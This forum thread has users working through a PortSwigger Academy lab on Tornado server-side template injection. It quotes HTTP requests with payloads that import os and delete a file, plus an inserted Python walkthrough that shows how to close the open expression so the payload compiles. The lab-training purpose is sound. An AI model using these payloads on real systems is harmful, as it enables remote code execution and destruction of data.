Burp Suite User Forum


Hey, I'm having an error when launching payload

a | Last updated: Apr 17, 2020 06:30PM UTC

The name of the challenge: Basic server-side template injection (code context)

Request 1:

    POST /my-account/change-blog-post-author-display HTTP/1.1
    Host: <lab token>.web-security-academy.net
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://<lab token>.web-security-academy.net/my-account?id=wiener
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 117
    Connection: close
    Cookie: session=cookie
    Upgrade-Insecure-Requests: 1

    blog-post-author-display={% import os%}{{os.system('rm /home/carlos/morale.txt')}}&csrf=token

Request 2: go to the post and add a comment.

The payload will work in the name, but when calling his office <example os> specifically, an error comes up:

    No handlers could be found for logger "tornado.application"
    Traceback (most recent call last):
      File "<string>", line 15, in <module>
      File "/usr/lib/python2.7/dist-packages/tornado/template.py", line 317, in __init__
        "exec", dont_inherit=True)
      File "<string>.generated.py", line 5
        _tt_tmp = % import os%}{{os.system('rm /home/carlos/morale.txt')  # <string>:1
                  ^
    SyntaxError: invalid syntax

17 April 2020

When some syntax is executed it works successfully, like printing, reading files etc. And thanks in advance.

a | Last updated: Apr 18, 2020 02:04PM UTC

The solution was done

Majid | Last updated: Apr 18, 2020 05:42PM UTC

Hi, stuck in the same situation for 3 hours. Any hint?

a | Last updated: Apr 19, 2020 12:03PM UTC

Close the _tt_tmp = and add the payload.

Michelle, PortSwigger Agent | Last updated: Apr 20, 2020 09:46AM UTC

We'll post the solutions when the first 10 users have solved all the new labs. In the meantime, keep trying and have fun!

Wade | Last updated: Apr 22, 2020 02:12PM UTC

Same issue here. I tried basically the same payload except did:

    blog-post-author-display={%+import+os%}{{os.remove(/home/carlos/morale.txt)}}&csrf=token

and a bunch of variants like:

    {{import+os%3b+os.remove(/home/carlos/morale.txt}}

_tt_tmp=payload works for 7*7 but not for removing the file. The offending lines here (https://github.com/tornadoweb/tornado/blob/master/tornado/template.py) seem to be 325-329. Thanks Michelle.
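The SyntaxError in the first post and the hint to close `_tt_tmp =` before adding the payload can be reproduced offline. The block below is an added example written for this thread; it is not code from the lab, from Tornado, or from any poster. It assumes the vulnerable template wraps the stored setting as `{{` + setting + `}}` with `user.name` as the normal value (an assumption that fits the shape of the generated line in the traceback, not something the lab source confirms). `tokenize` is a simplified model of how Tornado scans for `{{ }}` and `{% %}` tags, including its rule that in a run of three braces the outermost one is literal text; it is not Tornado itself. The two payloads are the thread's own strings and are only parsed, never executed.

```python
import ast

# Assumed shape of the vulnerable template: the stored display setting is
# spliced straight into an expression, so the attacker is already inside
# {{ ... }} (a "code context"). The real lab template is not in the thread;
# this prefix/suffix and the default value "user.name" are assumptions.
TEMPLATE_PREFIX = "{{"
TEMPLATE_SUFFIX = "}}"
DEFAULT_SETTING = "user.name"

# Payloads quoted from the thread (strings only; nothing here runs them).
RAW_PAYLOAD = "{% import os%}{{os.system('rm /home/carlos/morale.txt')}}"
# Same payload with the open expression closed first: the leading
# "user.name}}" completes the {{ ... }} that the template already opened.
CLOSED_PAYLOAD = "user.name}}{% import os %}{{os.system('rm /home/carlos/morale.txt')"


def build_template(setting):
    """Mimic the server splicing the user-controlled setting into the template."""
    return TEMPLATE_PREFIX + setting + TEMPLATE_SUFFIX


def tokenize(template):
    """Split a template into ('text' | 'expr' | 'directive', body) chunks.

    Simplified model of Tornado's scan for {{ }} and {% %}: a tag runs to the
    first matching closer, and in a run of three braces the first brace is
    literal text. {# #} comments are not modelled.
    """
    chunks = []
    pos, n = 0, len(template)
    while pos < n:
        start = template.find("{", pos)
        if start == -1:
            chunks.append(("text", template[pos:]))
            break
        nxt = template[start + 1] if start + 1 < n else ""
        if nxt not in ("{", "%"):
            # a lone "{" is ordinary text
            chunks.append(("text", template[pos:start + 1]))
            pos = start + 1
            continue
        if nxt == "{" and start + 2 < n and template[start + 2] == "{":
            # "{{{": treat the outermost brace as text and keep scanning
            chunks.append(("text", template[pos:start + 1]))
            pos = start + 1
            continue
        if start > pos:
            chunks.append(("text", template[pos:start]))
        closer = "}}" if nxt == "{" else "%}"
        end = template.find(closer, start + 2)
        if end == -1:
            raise ValueError("unclosed tag at offset %d" % start)
        body = template[start + 2:end].strip()
        chunks.append(("expr" if closer == "}}" else "directive", body))
        pos = end + 2
    return chunks


def first_syntax_error(template):
    """Return the body of the first {{ }} chunk that is not valid Python, else None.

    Tornado compiles each expression into a generated line of the form
    `_tt_tmp = <body>`; checking the body with ast.parse reproduces that
    compile step without evaluating anything.
    """
    for kind, body in tokenize(template):
        if kind == "expr":
            try:
                ast.parse(body, mode="eval")
            except SyntaxError:
                return body
    return None


if __name__ == "__main__":
    for label, setting in [("benign", DEFAULT_SETTING),
                           ("raw payload", RAW_PAYLOAD),
                           ("closed payload", CLOSED_PAYLOAD)]:
        template = build_template(setting)
        print(label, "->", template)
        for chunk in tokenize(template):
            print("   ", chunk)
        print("    first bad expression:", first_syntax_error(template))
```

Running it shows why the raw payload dies at compile time: the server's own `{{` is still open, so everything up to the first `}}` becomes one expression body (`% import os%}{{os.system(...)`), which is exactly the line in the traceback. Prefixing the payload with a value that completes that expression (`user.name}}`) turns the rest into a separate `{% import os %}` directive and a clean `{{os.system(...)}}` expression, and the template compiles.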

Peter | Last updated: Apr 23, 2020 02:12AM UTC

How would you write it if you knew that there are multiple elements?
